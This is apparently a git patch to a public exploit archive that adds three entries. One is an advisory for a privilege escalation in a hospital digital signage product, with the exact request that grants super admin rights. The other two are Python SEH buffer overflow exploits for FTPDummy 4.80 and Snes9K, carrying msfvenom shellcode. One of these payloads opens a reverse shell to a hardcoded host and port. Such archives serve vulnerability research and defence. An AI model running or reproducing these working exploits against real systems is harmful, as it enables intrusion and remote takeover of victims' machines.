From dc7e147e7055b89661151c8722fb65c5f9ca813f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 24 Jul 2020 05:02:04 +0000
Subject: [PATCH] DB: 2020-07-24

3 changes to exploits/shellcodes

FTPDummy 4.80 - Local Buffer Overflow (SEH)
Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)
UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass
---
 exploits/hardware/webapps/48684.txt | 51 ++++++++++++++++++
 exploits/windows/local/48685.py | 80 +++++++++++++++++++++++++++++
 exploits/windows/local/48686.py | 61 ++++++++++++++++++++++
 files_exploits.csv | 3 ++
 4 files changed, 195 insertions(+)
 create mode 100644 exploits/hardware/webapps/48684.txt
 create mode 100755 exploits/windows/local/48685.py
 create mode 100755 exploits/windows/local/48686.py
diff --git a/exploits/hardware/webapps/48684.txt b/exploits/hardware/webapps/48684.txt
new file mode 100644
index 000000000..ea002d534
--- /dev/null
+++ b/exploits/hardware/webapps/48684.txt
@@ -0,0 +1,51 @@
+# Title: UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass
+# Date: 2020-07-23
+# Author: LiquidWorm
+# Product web page: http://www.medivision.co.kr
+# CVE: N/A
+
+Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
+Product web page: http://www.medivision.co.kr
+Affected version: Firmware 1.5.1 (2013.01.3)
+
+Summary: Medivision is a service that provides everything from DID operation to
+development of DID (Digital Information Display) optimized for hospital environment
+and production of professional contents, through DID product installation, image,
+video content planning, design work, and remote control. This is a one-stop solution
+that solves management at once.
+
+Desc: The application suffers from a privilege escalation vulnerability. Normal user
+can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an
+HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super
+admin rights.
+
+Tested on: Apache/2.4.7 (Ubuntu)
+ PHP/5.5.9-1ubuntu4.22
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5575
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php
+
+
+19.06.2020
+
+--
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/48685.py b/exploits/windows/local/48685.py
new file mode 100755
index 000000000..8a6aaab2a
--- /dev/null
+++ b/exploits/windows/local/48685.py
@@ -0,0 +1,80 @@
+# Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH)
+# Date: 2020-07-22
+# Author: Felipe Winsnes
+# Software Link: http://www.dummysoftware.com/ftpdummy.html
+# Version: 4.80
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "ftpdummypref3.dat".
+# 2.- Place the generated file into "C:\Program Files\FTPDummy!\".
+# 3.- Open the application.
+# 4.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
+# Payload size: 448 bytes
+
+buf = b""
+buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e"
+buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45"
+buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c"
+buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b"
+buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30"
+buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52"
+buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a"
+buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72"
+buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54"
+buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71"
+buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57"
+buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34"
+buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49"
+buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50"
+buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43"
+buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38"
+buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72"
+buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b"
+buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44"
+buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a"
+buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c"
+buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71"
+buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42"
+buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f"
+buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50"
+buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45"
+buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59"
+buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32"
+buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42"
+buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78"
+buf += b"\x50\x65\x73\x30\x41\x41"
+
+start = "\x41"* 8
+start += "\x0d\x0a\x31\x0d\x0a"
+ending = "\x0d\x0a"
+
+end = "170.1.1.0"
+end += "\x0d\x0a"
+end += "\x22"
+end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE"
+end += "\x22"
+
+nseh = "\x70\x08\x71\x06"
+seh = struct.pack(" Connect to Server
+# 5. Paste the clipboard into the "Port Number" field
+# 6. Click on Connect and then on OK
+
+#!/usr/bin/python
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py
+
+buf = ""
+buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29"
+buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f"
+buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71"
+buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9"
+buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4"
+buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93"
+buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8"
+buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b"
+buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6"
+buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28"
+buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d"
+buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f"
+buf += "\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8"
+buf += "\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86"
+buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83"
+buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0"
+buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3"
+buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79"
+buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde"
+buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7"
+buf += "\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2"
+buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8"
+buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd"
+buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72"
+buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05"
+buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c"
+buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1"
+
+exploit = "A"*420
+exploit += "\x74\x06\x75\x04"
+# 0x10015140 pop pop ret; SDL.dll
+exploit += "\x40\x51\x01\x10"
+exploit += "\x41"*(2000-428-len(buf))
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 77a83fdbd..cc50ac2d9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11123,6 +11123,8 @@ id,file,description,date,author,type,platform,port
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
+48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
+48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42930,3 +42932,4 @@ id,file,description,date,author,type,platform,port
 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
+48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,